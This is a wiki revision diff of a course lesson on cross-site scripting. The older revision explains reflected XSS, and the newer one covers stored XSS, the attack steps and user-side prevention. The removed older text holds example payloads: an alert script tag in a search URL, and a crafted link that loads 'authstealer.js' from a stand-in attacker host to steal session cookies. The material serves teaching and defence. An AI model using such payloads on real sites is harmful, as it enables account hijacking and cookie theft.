modul:m183:learningunits:lu10:lu10b

Unterschiede

Hier werden die Unterschiede zwischen zwei Versionen angezeigt.

Link zu dieser Vergleichsansicht

Beide Seiten der vorigen Revision Vorhergehende Überarbeitung
Nächste Überarbeitung		 Vorhergehende Überarbeitung
modul:m183:learningunits:lu10:lu10b [2025/12/27 21:04] dgaravaldimodul:m183:learningunits:lu10:lu10b [2026/01/28 16:35] (aktuell) dgaravaldi
Zeile 1: Zeile 1:
-====== LU10b - Reflected cross site scripting (XSS) attacks ======  +====== LU10b - Cross-Site Scripting (XSS) Attacks ====== 
-\\ +<sup>Internal reference: lu/10-2.md</sup>\\
-==== What is a reflected XSS attack ====+
  
-Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.+**Cross-site scripting (XSS)** is very common type of web application attack vector in which malicious code is injected into vulnerable web application. Unlike other attacks that target the application’s server or database directly, XSS targets the **users of the web application** — because the injected code runs in their browsers in the context of the legitimate website
  
-The script is activated through a linkwhich sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitizedwhich allows for the manipulation of a web application’s functions and the activation of malicious scripts.+A successful XSS attack can cause serious damage — including compromised user accountsactivation of Trojan code, manipulation of page content to trick users into sharing sensitive data, or exposure of session cookies that allow attackers to impersonate valid users
  
-To distribute the malicious link, a perpetrator typically embeds it into an email or third party website (e.g., in a comment section or in social media). The link is embedded inside an anchor text that provokes the user to click on it, which initiates the XSS request to an exploited website, reflecting the attack back to the user.+\\ 
 +==== Types of XSS Attacks ====
  
-{{:modul:m183:learningunits:lu10:reflected-xss.png?600}}+There are **two major types** of cross-site scripting attacks commonly discussed:
  
-Unlike a stored attack, where the perpetrator must locate a website that allows for permanent injection of malicious scripts, reflected attacks only require that the malicious script be embedded into a link. That being said, in order for the attack to be successful, the user needs to click on the infected link. +    * **Stored XSS (Persistent)** – A malicious script is permanently injected into an application and served to all users.  
- +    * **Reflected XSS (Non-Persistent)** – A malicious script is embedded in URL or requestthen reflected off the web server back to the user’s browser when the link is visited
-As such, there are a number of key differences between reflected and stored XSS attacks, including: +
- +
-    * Reflected attacks are more common. +
-    * Reflected attacks do not have the same reach as stored XSS attacks. +
-    Reflected attacks can be avoided by vigilant users. +
-    With reflected XSS, the perpetrator plays a “numbers game” by sending the malicious link to as many users as possible, thereby improving his odds of successfully executing the attack.+
  
 \\ \\
-==== Reflected XSS attack example ==== +==== What is Stored Cross-Site Scripting ====
-While visiting a forum site that requires users to log in to their account, a perpetrator executes this search query <code><script type='text/javascript'>alert('xss');</script></code> causing the following things to occur:+
  
-The query produces an alert box saying: 
  
-<code> +To execute a **stored XSS attack**, the attacker must find a vulnerability in a web application where user input is stored without proper validation or escaping. A common example is when a comment field or form accepts HTML input and embeds it directly into pages viewed by other users
-<script type='text/javascript'>alert('XSS');</script > not found. +
-</code>+
  
-The page's URL reads <code>http://ecommerce.com?q=<script type='text/javascript'>alert('XSS'); </script></code>+**Example**An attacker enters a comment containing JavaScript that steals session cookiesEvery visitor who views the comment will run the malicious script unknowingly
-This tells the perpetrator that the website is vulnerable. Next, he creates his own URL,  +
-which reads <code>http://forum.com?q=news<\script%20src="http://hackersite.com/authstealer.js"</code> and embeds it as a  +
-link into a seemingly harmless email, which he sends to a group of forum users.+
  
-While the sending address and subject line may appear suspect to some, it does not mean that it won’t be clicked onIn fact, even if only one in every 1,000 recipients of the email click on the link, that still amounts to several dozen infected forum users. They will be taken to the forum’s websitewhere the malicious script will be reflected back to their browser, enabling the perpetrator to steal their session cookies and hijack their forum accounts.+\\ 
 +==== Stored XSS Attack — Step by Step ==== 
 +{{:modul:m183:learningunits:lu10:stored-xss.png?600}} 
 + 
 +    - The attacker discovers a page with an input field that allows HTML. 
 +    - They insert malicious JavaScript code into that field.  
 +    - The application stores and later serves that code as part of normal content. 
 +    - When other users visit the page, their browser executes the attack script
  
 \\ \\
-==== Reflected XSS attack prevention and mitigation ==== +==== How Stored XSS Endangers Users ==== 
-There are several effective methods for preventing and mitigating reflected XSS attacks. First and foremost, from the user’s point-of-view, vigilance is the best way to avoid XSS scripting. Specifically, this means not clicking on suspicious links which may contain malicious code. Suspicious links include those found in:+Stored XSS is especially dangerous because:
  
-    * Emails from unknown senders +    * It can impact **all users** who view the infected page.  
-    * A website’s comments section +    * Attacker-controlled scripts can steal session credentials or redirect users to phishing sites.  
-    * Social media feed of unknown users+    * Malicious payloads can embed external JavaScript that reports user data back to the attacker. 
  
 \\ \\
 ==== Related Topics ==== ==== Related Topics ====
-[1]: https://owasp.org/www-community/attacks/xss/ "Cross Site Scripting (XSS) | OWASP"+[1]: https://owasp.org/www-community/attacks/xss/ Cross Site Scripting (XSS) | OWASP 
 + 
 +[2]: https://developer.mozilla.org/docs/Web/Security/Attacks/XSS?utm_source=chatgpt.com Cross-site scripting (XSS) - Security | MDN 
 + 
 +----
  
 +[[https://creativecommons.org/licenses/by-nc-sa/4.0/|{{https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png}}]] Daniel Garavaldi
  • modul/m183/learningunits/lu10/lu10b.1766865894.txt.gz
  • Zuletzt geändert: 2025/12/27 21:04
  • von dgaravaldi